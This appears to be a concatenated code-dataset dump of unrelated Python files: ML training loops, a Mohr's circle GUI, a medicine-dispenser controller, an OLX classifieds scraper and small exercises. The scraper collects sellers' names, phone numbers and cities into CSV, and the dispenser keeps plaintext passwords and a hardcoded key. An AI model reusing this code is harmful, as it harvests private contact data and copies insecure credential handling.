ParallelUpdater(StandardUpdater):\n\n def __init__(self, iterator, optimizer, converter=convert.concat_examples,\n models=None, devices=None, loss_func=None):\n super(ParallelUpdater, self).__init__(\n iterator=iterator,\n optimizer=optimizer,\n converter=converter,\n loss_func=loss_func,\n )\n\n if models is None:\n if devices is None:\n raise ValueError('either models or devices must be specified')\n names = list(six.iterkeys(devices))\n\n try:\n names.remove('main')\n except ValueError:\n raise KeyError(\"'devices' must contain a 'main' key.\")\n\n models = {'main': optimizer.target}\n for name in names:\n model = copy.deepcopy(optimizer.target)\n if devices[name] >= 0:\n model.to_gpu(devices[name])\n models[name] = model\n if devices['main'] >= 0:\n optimizer.target.to_gpu(devices['main'])\n\n self._devices = devices\n self._models = models\n\n def connect_trainer(self, trainer):\n # Add observers for all (other) models.\n model_main = self.get_optimizer('main').target\n models_others = {\n k: v for k, v in self._models.items() if v != model_main\n }\n for name, model in models_others.items():\n trainer.reporter.add_observer(name, model)\n\n def update_core(self):\n optimizer = self.get_optimizer('main')\n model_main = optimizer.target\n models_others = {k: v for k, v in self._models.items()\n if v is not model_main}\n\n batch = self.get_iterator('main').next()\n\n #\n # Split the batch to sub-batches.\n #\n n = len(self._models)\n in_arrays_list = {}\n for i, key in enumerate(six.iterkeys(self._models)):\n in_arrays_list[key] = self.converter(\n batch[i::n], self._devices[key])\n\n # For reducing memory\n for model in six.itervalues(self._models):\n model.cleargrads()\n\n losses = []\n for model_key, model in six.iteritems(self._models):\n in_arrays = in_arrays_list[model_key]\n loss_func = self.loss_func or model\n\n if isinstance(in_arrays, tuple):\n in_vars = tuple(variable.Variable(x) for x in in_arrays)\n losses.append(loss_func(*in_vars))\n elif isinstance(in_arrays, dict):\n in_vars = {key: variable.Variable(x)\n for key, x in six.iteritems(in_arrays)}\n losses.append(loss_func(**in_vars))\n else:\n in_vars = variable.Variable(in_arrays)\n losses.append(loss_func(in_vars))\n\n for i in range(4):\n # For _uninitialized_params\n for model in six.itervalues(self._models):\n model.zerograds()\n\n for loss in losses:\n loss[i].backward()\n\n for model in six.itervalues(models_others):\n model_main.addgrads(model)\n\n optimizer.update()\n\n for model in six.itervalues(models_others):\n model.copyparams(model_main)\n","sub_path":"python/mitmul_chainer-faster-rcnn/chainer-faster-rcnn-master/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"531205051","text":"from pymongo import MongoClient\ndb=MongoClient()['session_edgenie']\ndata=list(db['maths_qn'].find())\ntag_converter={\n \"Inequalities\":\"Inequality\",\n \"Percent and Interest Problems\":'Percent-Interest',\n \"Absolute Values/Modules\":'Absolute_value',\n \"Number Properties\":'Number_property',\n \"Coordinate Geometry\":'Coordinate_geometry',\n \"Exponents/Powers\":'Exponent',\n \"Functions and Custom Characters\":'Function',\n \"Arithmetic\":'Arithmetic',\n \"Remainders\":'Remainder',\n \"Algebra\":'Algebra',\n \"Work/Rate Problems\":'Work-Rate',\n \"Geometry\":'Geometry',\n \"Combinations\":'Combinatorics',\n \"Poor Quality\":'',\n \"Mixture Problems\":'Proportion-Mixture',\n \"Out of Scope - Too Hard\":'Hard',\n \"Graphs and Illustrations\":'Graph-Diagrammatic',\n \"Divisibility/Multiples/Factors\":'Divisibility-Factor-Multiple',\n \"Word Problems\": 'Word_problem',\n \"Fractions/Ratios/Decimals\": 'Fraction--Decimal-Ratio',\n \"Overlapping Sets\": 'Sets-Overlapping',\n \"Probability\": 'Probability',\n \"Statistics and Sets Problems\": 'Set-Statistics',\n \"Distance/Rate Problems\": 'Rate-Sistance',\n \"Min/Max Problems\": 'Minimum-Maximum',\n \"Sequences\": 'Sequence',\n \"Must or Could be True Questions\": 'Must_be_true',\n \"Percents and Interest Problems\":'Percent-Interest',\n \"Roots\": 'Root',\n}\nfor i in data:\n i['tags']=[tag_converter[j] for j in i['tags']]\ndb['maths_qn'].drop()\ndb['maths_qn'].insert(data)\n","sub_path":"update_tags.py","file_name":"update_tags.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"492890212","text":"import cv2\nimport numpy as np\nimport pytesseract\nimport PIL\nimport ocr_testing\n\n\npin_tmpl = cv2.imread('img\\\\bank_tmpl.png')\nthreshold = .9\n\nfor i in range(29, 30):\n img_bgr = cv2.imread('screenshots\\\\fly_fish_{}.png'.format(i))\n img_gray = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2GRAY)\n dup_img = np.asarray(img_bgr.tolist() + img_bgr.copy().tolist())\n cv2.imshow('duplicate', dup_img)\n cv2.waitKey(0)\n res = cv2.matchTemplate(img_bgr, pin_tmpl, cv2.TM_CCOEFF_NORMED)\n loc = np.where(res > threshold)\n h, w = pin_tmpl.shape[:2]\n if len(list(zip(*loc[::-1]))):\n print(i)\n for pt in zip(*loc[::-1]):\n # cv2.rectangle(img_bgr, pt, (pt[0] + w, pt[1] + h), (255, 0, 0), 2)\n print(ocr_testing.img_to_text(img_gray[pt[1]+10:pt[1] + h, pt[0]+10:pt[0] + w], 100))\n # cv2.imshow('pin', img_bgr[pt[1]:pt[1] + h, pt[0]:pt[0] + w])\n # cv2.waitKey(0)\n\n # cv2.imshow('image', img_bgr)\n # cv2.waitKey(0)\n\nbody = ''\nbody += 'The current AQI for {param_name} is at {aqi}. Meaning that the air quality is {category}. ' \\\n 'Please be advised not to do any streneous activity outside.\\n\\n'.format(param_name=param['ParameterName'],\n aqi=param['AQI'],\n category=param['Category']['Name'])\n","sub_path":"match_bank_pin.py","file_name":"match_bank_pin.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18315673","text":"# Mohrs circle\nimport tkinter as tk\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nwindow = tk.Tk()\nwindow.title('Mohrs circle')\nwindow.geometry('800x750')\nTitle = tk.Label(window,text = 'This is a calculator to generate the correspond\\nMOHRS CIRCLE'\n ,font = ('ARial',20),width = 50, height = 2,bg = 'white')\nTitle.place(x = 0,y = 0,anchor = 'nw')\ni = 0\nimg = img = tk.PhotoImage(file = f'{i}-th.png')\ndef plot_circle(C_x,R):\n global i\n i += 1\n theta = np.arange(0,2*math.pi,0.001)\n theta = tuple(theta)\n circle_x = [C_x + R*math.cos(elem) for elem in theta]\n circle_y = [R*math.sin(elem) for elem in theta]\n plt.plot(circle_x,circle_y,label = f'{i}-th',linewidth = 1.0)\n \n plt.xlabel('sigma')\n plt.ylabel('tao')\n ax = plt.gca()\n ax.invert_yaxis()\n plt.legend(loc = 'best', fontsize = 9, title = f'{i}-th')\n plt.savefig(fname = f'{i}-th.png', format = \"png\")\n\ndef generate():\n global i\n global img\n var1 = float(E1.get())\n var2 = float(E2.get())\n var3 = float(E3.get())\n var4 = float(E4.get())\n R = math.pow(((var1 - var2)/2)**2 + var3**2,0.5)\n C_x = (var1 + var2)/2\n if C_x > 0:\n max1 = C_x + R\n else:\n max1 = abs(C_x - R)\n max2 = R\n plot_circle(C_x,R)\n img = tk.PhotoImage(file = f'{i}-th.png')\n img_now = canvas.create_image(300,160,anchor = 'center',image = img)\n lb1.insert('end',max1)\n lb2.insert('end',max2)\n\nP1 = tk.Label(window,text = 'The Sigma-X is : ',font = ('ARial',15)).place(x = 70,y = 80)\nP2 = tk.Label(window,text = 'The Sigma-Y is : ',font = ('ARial',15)).place(x = 420,y = 80)\nP3 = tk.Label(window,text = 'The Tao-XY is : ',font = ('ARial',15)).place(x = 70,y = 120)\nP4 = tk.Label(window,text = 'The theta is : ',font = ('ARial',15)).place(x = 420,y = 120)\nA1 = tk.Label(window,text = 'The max sigma is :',font = ('ARial',15)).place(x = 100,y = 560)\nA2 = tk.Label(window,text = 'The max tao is : ',font = ('ARial',15)).place(x = 480,y = 560)\n\nE1 = tk.Entry(window)\nE1.place(x = 260,y = 86)\nE2 = tk.Entry(window)\nE2.place(x = 610,y = 86)\nE3 = tk.Entry(window)\nE3.place(x = 260,y = 126)\nE4 = tk.Entry(window)\nE4.place(x = 610,y = 126)\n\nlb1 = tk.Listbox(window,width = 20,height = 5,font = ('ARial',15))\nlb1.place(x = 100,y = 590)\nlb2 = tk.Listbox(window,width = 20,height = 5,font = ('ARial',15))\nlb2.place(x = 480,y = 590)\n\ncanvas = tk.Canvas(window,bg = 'white',height = 300,width = 600)\nGenerate = tk.Button(window,text = 'Generate the circle',width = 30,height = 1\n ,font = ('ARial',15),bg = 'yellow',command = generate).place(x = 400,y = 200,anchor = 'center')\n\nimg_now = canvas.create_image(300,160,anchor = 'center',image = img)\ncanvas.place(x = 400,y = 400,anchor = 'center')\n\nwindow.mainloop()","sub_path":"工程力學/Mohrs_circle.py","file_name":"Mohrs_circle.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72189760","text":"import threading\nimport hashlib\nimport arduino\nimport control\nimport database\nimport calendar\nimport time\nfrom prescription import Prescription\nfrom user import User\nfrom preferences import Preferences\nimport sys\n\n# Setup Variables\npref = Preferences()\nrunning = False\nthreads = []\n\n# Check if this is the first-run\nif pref.get_preference(\"first_time\", True):\n import sampledata\n\n # Set some default preferences\n pref.set_preference(\"first_time\", False)\n pref.set_preference(\"database\", \"data/database.db\")\n pref.set_preference(\"arduino_port\", \"COM3\")\n pref.set_preference(\"notifications\", False)\n\n # Create the database and fill it with some data\n sampledata.init()\n\n\n# Communication Thread\nclass communicationThread(threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n global running, pref\n\n print(\"Starting \" + self.name)\n database.init(pref.get_preference(\"database\"))\n\n # Communication loop\n ard = arduino.Interface(b'ZxPEh7ezUDq54pRv', pref.get_preference(\"arduino_port\"))\n while running:\n if self._scanned_card(ard.read_rfid()):\n ard.send_accept()\n else:\n ard.send_reject()\n\n # threads.remove(self)\n print(\"Exiting \" + self.name)\n database.close()\n\n @staticmethod\n def _scanned_card(rfid):\n # Fetch a user from the database with the given UID\n user = control.get_user(rfid)\n\n # Return a REJECT if the user was not found\n if user is None:\n print(\"No user found with the RFID:\", rfid)\n return False\n\n print(\"User found:\", user.id)\n\n if user.role == 'pat':\n # If the user is a patient, get all prescriptions and the inventory\n prescriptions = control.get_prescriptions(user)\n inventory = control.get_inventory()\n\n # Show the dispensed drugs in the terminal\n if len(prescriptions) > 0:\n print(\"Dispensing \", len(prescriptions), \" medicine(s)\")\n\n for pres in prescriptions:\n for i in inventory:\n if pres.medicine_id == i.id:\n i.stock = i.stock - pres.amount\n database.update_inventory(i)\n drug = control.get_drug_by_prescription(pres)\n print(drug.name)\n print(\"\\tAmount:\\t\" + str(pres.amount))\n print(\"\\tDescription:\\t\" + pres.descr)\n database.commit()\n\n else:\n print(\"No prescriptions available for consumption at this moment\")\n\n if user.role == 'ref': # For doctor or nurse, assuming that they will only want to access the machine in order to refill it\n control.inventory_refill()\n print(\"Refilled the dispenser\")\n\n\n return True\n\n\n# Command prompt Thread\nclass promptThread(threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n print(\"Starting \" + self.name)\n global running\n global doctor_test\n global doctor_id\n doctor_test = False\n\n # Prompt loop\n while running:\n cmd = input(\"> \")\n if cmd == \"exit\":\n running = False\n database.close()\n print(\"Exiting now\")\n sys.exit(0)\n\n # command for logging in with username and password if the username and password are valid\n # doctor_test is set to true and doctor id is set to the corresponding id so the database can be edited\n if cmd == \"login\":\n doctors = database.get_users_by_role('doc')\n print(\"Please login to make changes.\")\n login_username = input(\"Username: \")\n login_password = input(\"Password: \")\n for doctor in doctors:\n if doctor.username == login_username and doctor.password == login_password:\n doctor_id = doctor.id\n print(\"Logged in as doctor id: \" + str(doctor_id))\n doctor_test = True\n if not doctor_test:\n print(\"Invalid credentials!\")\n\n # when logging out doctor test is set to false so no changes can be made\n # doctor id is set to 0 so nobody can actually see who was the last doctor to log in\n if cmd == \"logout\" and doctor_test:\n doctor_test = False\n print(\"Logged out as doctor id: \" + str(doctor_id))\n doctor_id = 0\n\n # to update credentials you must be logged in as a doctor and you have to verify your login data again\n if cmd == \"update credentials\" and doctor_test:\n user = database.get_user_by_uid(doctor_id)\n print(\"Please verify your login.\")\n login_username = input(\"Old username: \")\n login_password = input(\"Old password: \")\n if user.username == login_username and user.password == login_password:\n new_username = input(\"New username = \")\n new_password = input(\"New password = \")\n user.username = new_username\n user.password = new_password\n database.update_user(user)\n database.commit()\n print(\"Credentials updated.\")\n\n # to update a rfid tag you have to be logged in as a doctor and you have to input a user_id to which the new rfid will be bound\n if cmd == \"update rfid\" and doctor_test:\n user_id = input(\"User id = \")\n user = database.get_user_by_uid(user_id)\n if user is None:\n print(\"No user with this id!\")\n continue\n\n new_rfid = input(\"New rfid = \")\n user.rfid = new_rfid\n database.update_user(user)\n database.commit()\n print(\"rfid updated.\")\n\n # when logged in as a doctor you can get all users with their roles (but not password or rfid)\n if cmd == \"get users\" and doctor_test:\n users = database.get_users()\n print(\"id\\trole\")\n for user in users:\n print(str(user.id) + \"\\t\" + str(user.role))\n\n # when logged in you can get prescriptions for a single user or you can get all prescriptions\n if cmd == \"get prescriptions\" and doctor_test:\n choice = input(\"For all users y/n: \")\n prescriptions = database.get_prescriptions()\n if choice == \"y\":\n print(\"id\\tmedicine\\tdescription\")\n for prescription in prescriptions:\n print(str(prescription.id) + \"\\t\" + str(prescription.medicine_id) + \"\\t\\t\\t\" + str(prescription.descr))\n elif choice == \"n\":\n user_id = int(input(\"id = \"))\n print(\"id\\tmedicine\\tdescription\")\n for prescription in prescriptions:\n if prescription.uid == user_id:\n print(str(prescription.id) + \"\\t\" + str(prescription.medicine_id) + \"\\t\\t\\t\" + str(prescription.descr))\n else:\n print(\"Invalid input!\")\n\n # as a logged in doctor you can add prescriptions. you will be prompted for all the data\n if cmd == \"add prescription\" and doctor_test:\n prescriptions = database.get_prescriptions()\n prescription_list = []\n for prescription in prescriptions:\n prescription_list.append(prescription.id)\n prescription_id = int(max(prescription_list) + 1)\n patient_id = int(input(\"Patient id = \"))\n medicine_id = int(input(\"Medicine id = \"))\n description = input(\"Description of use = \")\n max_dose = int(input(\"Daily max dose = \"))\n min_time = int(input(\"Minimum time between dispenses in seconds = \"))\n amount = int(input(\"Amount of medicine per dispense/dose = \"))\n cur_dose = 0\n duration = int(input(\"Prescription duration in days = \")) * 86400\n date = int(calendar.timegm(time.gmtime()))\n\n # this part checks if the user is actually in the database else it prints \"patient does not exist\"\n users = database.get_users()\n patient_test = False\n for user in users:\n if patient_id == user.id:\n print(\"New prescription added with id: \" + str(prescription_id))\n database.insert_prescription(Prescription.parse_raw([prescription_id, patient_id, medicine_id, description, max_dose, min_time, amount, cur_dose, date, doctor_id, duration, date]))\n database.commit()\n patient_test = True\n if not patient_test:\n print(\"Patient does not exist!\")\n\n # as a logged in doctor you can remove a prescription by id\n if cmd == \"remove prescription\" and doctor_test:\n prescription_id = int(input(\"prescription id = \"))\n database.remove_prescription(prescription_id)\n database.commit()\n print(\"Prescription removed.\")\n\n # as a logged in doctor you can add new users. you get prompted for all data (and for username and pw if you are adding a doctor)\n if cmd == \"add user\" and doctor_test:\n users = database.get_users()\n user_list = []\n for user in users:\n user_list.append(user.id)\n user_id = int(max(user_list) + 1)\n rfid = int(input(\"RFID = \"))\n role = input(\"role(pat/doc/ref) = \")\n if role == 'doc':\n new_username = input(\"New user username = \")\n new_password = input(\"New user password = \")\n else:\n new_username = \"\"\n new_password = \"\"\n database.insert_user(User.parse_raw([user_id, rfid, role, new_username, new_password]))\n database.commit()\n print(\"New user added with id: \" + str(user_id))\n\n # as a logged in doctor you can remove users by id\n if cmd == \"remove user\" and doctor_test:\n user_id = int(input(\"User id = \"))\n database.remove_user(user_id)\n database.commit()\n print(\"User removed.\")\n\n # you can always print out all existing commands\n if cmd == \"help\":\n commands = [\"login\",\n \"logout\",\n \"exit\",\n \"get prescriptions\",\n \"add prescription\",\n \"remove prescription\",\n \"add user\",\n \"remove user\",\n \"update credentials\",\n \"update rfid\"]\n print(\"Commands:\", commands)\n\n\n # threads.remove(self)\n print(\"Exiting \" + self.name)\n\n\n# Communication Thread\nclass TimeModel(threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n print(\"Starting \" + self.name)\n # Imports\n import notification\n from concurrent.futures import thread\n\n # Make global variables available in local context\n global running, pref\n\n # Initialize everything\n\n database.init(pref.get_preference(\"database\"))\n\n # A refill every 24 hours\n refill = 24 * 60 * 60\n sleepy_time = 5\n\n cur_time = int(calendar.timegm(time.gmtime()))\n last_time = cur_time - (cur_time % refill)\n\n # Run the code\n while running:\n # Calculate next refill\n cur_time = int(calendar.timegm(time.gmtime()))\n new = last_time + refill\n\n # Refill?\n if cur_time > new:\n notification.send_refill()\n control.inventory_refill()\n last_time = new\n else: # Wait till refill\n time.sleep(sleepy_time)\n\n database.close()\n\n\n# Encrypt RFID-tag\ndef encryptRFID(tag):\n salt = 10 # TODO: replace with database UID or something\n encrypted = hashlib.sha512(salt + tag)\n\n\n# Main code\nprint(\"Starting Main Thread\")\n\nrunning = True\n\n# starting communication thread for communication with arduino\ncommunication_thread = communicationThread(1, \"Communication Thread\")\ncommunication_thread.start()\nthreads.append(communication_thread)\n\n# starting TimeModel thread for notifications\ntime_thread = TimeModel(3, \"Time Model Thread\")\ntime_thread.start()\nthreads.append(time_thread)\n\n# starting prompt thread for command prompt\nprompt_thread = promptThread(2, \"Prompt Thread\")\nprompt_thread.start()\nthreads.append(prompt_thread)\n\n# Wait for all threads to complete\nfor t in threads:\n t.join()\n\nprint(\"Exiting Main Thread\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"159516289","text":"from selenium import webdriver\nimport time\nimport random\nimport csv\n\nclass Search:\n\t\"\"\"Класс ищет по ключевым словам ссылки на объявления на сайте OLX.\t\n\tИ сохраняет их в txt файл под названиям urls.txt\t\n\tв томже каталоге\"\"\"\n\n\tdef __init__(self, search_words):\n\t\tself.search_words = search_words\n\t\tself.worker()\n\t\n\tdef worker(self):\n\t\tbrowser = webdriver.Firefox()\n\t\tbrowser.get(f'https://www.olx.ua/list/q-{self.search_words}')\n\t\ttry:\n\t\t\ttotal_page = int(browser.find_element_by_css_selector('#body-container > div:nth-child(3) > div > div.pager.rel.clr > span:nth-child(11) > a > span').text )\n\t\texcept:\n\t\t\ttotal_page = 2\n\t\t# поиск по страницам \n\t\tfor page in range(1,total_page):\n\t\t\tbrowser.get(f'https://www.olx.ua/list/q-{self.search_words}={page}')\n\t\t\telements = browser.find_elements_by_css_selector(\"#offers_table .offer-wrapper\")\n\t\t\tlist_href = [element.find_element_by_tag_name(\"a\").get_attribute('href') for element in elements]\n\t\t\t# сохранение в файл\n\t\t\twith open(f'urls{self.search_words}.txt', 'a', encoding='utf8') as f:\n\t\t\t\tfor i in list_href:\n\t\t\t\t\tf.write(i + '\\n')\n\t\t#time.sleep(random.choice(range(2,6))) # когда нужно подождать (wait не использую)\n\n\t\tbrowser.close()\n\nclass Main:\n\t\"\"\"Основной класс, который открывает файл с ссылками и переходит по каждой ис них\t\n\t\tвитегавает имя, номер телефона, город и сохраният в csv ��айл\"\"\"\n\tdef __init__(self, search_words):\n\t\tself.search_words = search_words\n\t\tself.worker()\n\n\tdef worker(self):\n\t\twith open(f'urls{self.search_words}.txt') as f:\n\t\t\turls = f.read().split('\\n')\n\n\t\tfor url in urls:\n\t\t\ttry:\n\t\t\t\titems = {}\n\t\t\t\tbrowser = webdriver.Firefox()\n\t\t\t\tbrowser.get(url)\n\t\t\t\tbrowser.find_element_by_css_selector('span.spoiler:nth-child(3)').click()\n\t\t\t\ttime.sleep(1.5)\n\t\t\t\ttry:\n\t\t\t\t\tbrowser.find_element_by_css_selector('span.spoiler:nth-child(3)').click()\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tbrowser.find_element_by_css_selector('span.spoiler:nth-child(3)').click()\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\titems['name'] = browser.find_element_by_css_selector(\".offer-user__details > h4:nth-child(1) > a:nth-child(1)\").text\n\t\t\t\tself.phone = browser.find_element_by_css_selector(\"div.contact-button\").text\n\t\t\t\tself.make_phone_format()\n\t\t\t\titems['phone'] = self.phone\n\t\t\t\tif 'Показать' in self.phone:\n\t\t\t\t\tcontinue\n\t\t\t\titems['city'] = [browser.find_element_by_css_selector(\".offer-user__address > address:nth-child(2) > p:nth-child(1)\").text]\n\t\t\t\tself.save_csv(items)\n\t\t\texcept:\n\t\t\t\tprint('error: ', url)\n\t\t\tbrowser.close()\n\n\tdef make_phone_format(self):\n\t\tself.phone = self.phone.replace(' ', '').replace('-', '').replace('(', '').replace(')', '') \n\t\n\t\tif len(self.phone) != 13:\n\t\t\tself.phone = '+380' + self.phone[-9:]\n\t\tif self.phone[2] == '0' and self.phone[3] == '0':\n\t\t\tself.phone = '+' + self.phone[:3] + self.phone[4:]\n\n\tdef save_csv(self, items):\n\t\twith open(f'{self.search_words}.csv', 'a', encoding=\"utf-8\") as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerow((items['name'],\n\t\t\t\t\t\t\t items['phone'],\n\t\t\t\t\t\t\t items['city'] \n\t\t\t\t\t\t))\n\n\n\nif __name__ == '__main__':\n\tsearch_words = input('Что будем искать?:\\n') #нужно ввести то что ищем\n\t#Search(search_words)\n\tMain(search_words)\n\t","sub_path":"kab/search_words.py","file_name":"search_words.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"113061789","text":"import datetime\n\n\nTRAIN_MODELS = True\ndb_ds = 'data/bitfinex_data.h5'\ndb_path = 'data/bout.h5'\n\n\n# Training Parameters\nfeature_size = 2\nstart_date_train = datetime.datetime(2018, 10, 28)\nend_date_train = datetime.datetime(2018, 11, 8)\ntrain_test_ratio = .85\npredictor_mode = 'DashGRU'\nensemble_learning = False\nensemble_learning_modes = ['ActGRU', 'TWSTDGRU', 'TWSTD2GRU', 'DashGRU', 'DashLSTMGRU', ]\nstride = 1\n\n\n# Trading Parameters\nsequential_trading = True\nsequential_trading_iterations = 5\nstart_date_sequential_trading = datetime.datetime(2018, 1, 20)\nwallets = 100\n\nbad_coins = [\n # 'BTCUSD',\n # 'DSHUSD',\n # 'ETHUSD',\n # 'EOSUSD',\n # 'ETCUSD',\n # 'ETHUSD',\n # 'IOTUSD',\n # 'NEOUSD',\n # 'LTCUSD',\n # 'XLMUSD',\n # 'XMRUSD',\n # 'XRPUSD',\n # 'TRXUSD',\n # 'ZECUSD',\n]\n\nmax_in_portfolio = 1\nstop_loss_ratio = 0.004\n\n\nsubplot_in_row = 1\nsubplot_in_col = 1\n\n\n# Exchange Simulation Parameters\nfee = 0.002\nstart_date_test = datetime.datetime(2018, 11, 8)\nend_date_test = datetime.datetime.now() # datetime.datetime(2018, 4, 16)\nmax_size_of_trade_set = 288 # np.inf\n\n","sub_path":"standard/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"177782039","text":"import tensorflow as tf\n#import input_data\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nfrom random import randint\nimport numpy as np\n\nlogs_path = 'log_mnist_softmax'\n\nbatch_size = 100\nlearning_rate = 0.5\ntraining_epochs = 3\nmnist = input_data.read_data_sets(\"data\", one_hot=True)\n#X = tf.placeholder(tf.float32, [None, 28, 28, 1],name=\"input\")\nX = tf.placeholder(tf.float32, [None, 784],name=\"input\")\nY_ = tf.placeholder(tf.float32, [None, 10])\n\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\nXX = tf.reshape(X, [-1, 784])\n\nY = tf.nn.softmax(tf.matmul(XX, W) + b,name=\"output\")\ncross_entropy = -tf.reduce_mean(Y_ * tf.log(Y)) * 1000.0\ncorrect_prediction = tf.equal(tf.argmax(Y, 1), tf.argmax(Y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\ntrain_step = tf.train.GradientDescentOptimizer(0.005).minimize(cross_entropy)\ntf.summary.scalar(\"cost\", cross_entropy)\ntf.summary.scalar(\"accuracy\", accuracy)\nsummary_op = tf.summary.merge_all()\n\n\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for epoch in range(training_epochs):\n batch_count = int(mnist.train.num_examples/batch_size)\n for i in range(batch_count):\n batch_x, batch_y = mnist.train.next_batch(batch_size)\n sess.run([train_step],feed_dict={X: batch_x, Y_: batch_y})\n print(\"Epoch: \", epoch)\n print(\"Accuracy: \", accuracy.eval\\\n (feed_dict={X: mnist.test.images,\\\n Y_: mnist.test.labels}))\n\n print(\"done\")\n\n writer = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph())\n writer.close()\n num = randint(0, mnist.test.images.shape[0])\n img = mnist.test.images[num]\n classification = sess.run(tf.argmax(Y, 1),\\\n feed_dict={X: [img]})\n print('Neural Network predicted', classification[0])\n print('Real label is:', np.argmax(mnist.test.labels[num]))\n save_path = saver.save(sess, \"./saved_mnist_cnn.ckpt\")\n print(\"Model saved to %s\" % save_path)\n","sub_path":"Modules/Module-4/code/extra-code/example-1.py","file_name":"example-1.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"648907211","text":"def dfs(vertex, graph, visited:set):\n \"\"\"Осуществляет поиск в глубину по графу graph начиная с вершины vertex.\n\n graph - словарь вида {вершина: {соседи} - множество}\n \"\"\"\n\n visited.add(vertex)\n\n\n for neighbour in graph[vertex]:\n if neighbour not in visited:\n dfs(neighbour, graph, visited)\n\ndef сount_connected_component(graph:dict):\n \"\"\"Осуществляет подсчет компенент связности графа\"\"\"\n \n visited = set()\n count = 0\n\n for vertex in graph:\n if vertex not in visited:\n dfs(vertex, graph, visited)\n count += 1\n \n return count\n \n \n\n \n","sub_path":"algo_and_ds/deep_first_search.py","file_name":"deep_first_search.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454078514","text":"import pygame\nfrom screens import util\n\n\ndef main(screen, clock):\n bg = util.get_image('background')\n bg_h = 934\n logo = util.get_image('logo')\n start = util.get_image('start_button')\n start = pygame.transform.scale(start, (350, 150))\n option = util.get_image('options_button')\n option = pygame.transform.scale(option, (400, 150))\n\n bg_animation_ticks = 200\n bg_ease = util.EaseOutSine(bg_animation_ticks, util.HEIGHT - bg_h, 0)\n logo_ease = util.EaseOutSine(bg_animation_ticks, -50, -160)\n\n for i in range(bg_animation_ticks):\n # Initialize & scroll start screen\n screen.fill([0, 255, 0])\n screen.blit(bg, (0, next(bg_ease)))\n screen.blit(logo, (0, next(logo_ease)))\n\n if not util.tick(clock):\n return False\n\n for i in range(0, 200):\n start.set_alpha(i/20) # doesn't make the image fully opaque\n option.set_alpha(i/20)\n screen.blit(start, (450, 350))\n screen.blit(option, (420, 500))\n if not util.tick(clock):\n return False\n\n while True:\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n x = 450\n y = 350\n w = 350\n h = 150\n if x+w > mouse[0] > x and y+h > mouse[1] > y:\n if click[0] == 1:\n return True\n if not util.tick(clock):\n return False\n","sub_path":"screens/start_screen.py","file_name":"start_screen.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"304975373","text":"class Solution:\n @staticmethod\n def two_sum(_nums: list, _target: int) -> list:\n indices = list()\n for ind_x, num_x in enumerate(_nums):\n for ind_y, num_y in enumerate(_nums):\n if ind_x == ind_y:\n continue\n elif num_x + num_y == _target:\n indices.append(num_x)\n indices.append(num_y)\n return indices\n\n\n_nums = [2, 7, 11, 15]\n_target = 9\n_s = Solution()\n_s.two_sum(_nums, _target)\n","sub_path":"problems_solved/01_two-sum.py","file_name":"01_two-sum.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"402430047","text":"# -*- coding: UTF-8 -*-\ndict = {}\nwith open(\"data.txt\", \"r\", encoding=\"utf-8\") as f:\n for line in f.readlines():\n line = line.strip('\\n')\n # 每一行以双空格作为定界符进行拆分\n list = line.split(sep=\" \")\n for item in list:\n if (dict.__contains__(item)):\n dict[item] += 1;\n else:\n dict.setdefault(item, 1)\n # print(line)\nwith open(\"dict.txt\", \"w\", encoding=\"utf-8\") as f:\n for word in dict.keys():\n list = word.split(sep=\"/\")\n print(list)\n if (len(list) > 1):\n s = list[0] + ' ' + str(dict[word]) + ' ' + list[1] + '\\n'\n f.write(s)\n","sub_path":"NLP/homework1/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"427342956","text":"from .models import Info\nfrom copy import deepcopy, copy\nfrom sys 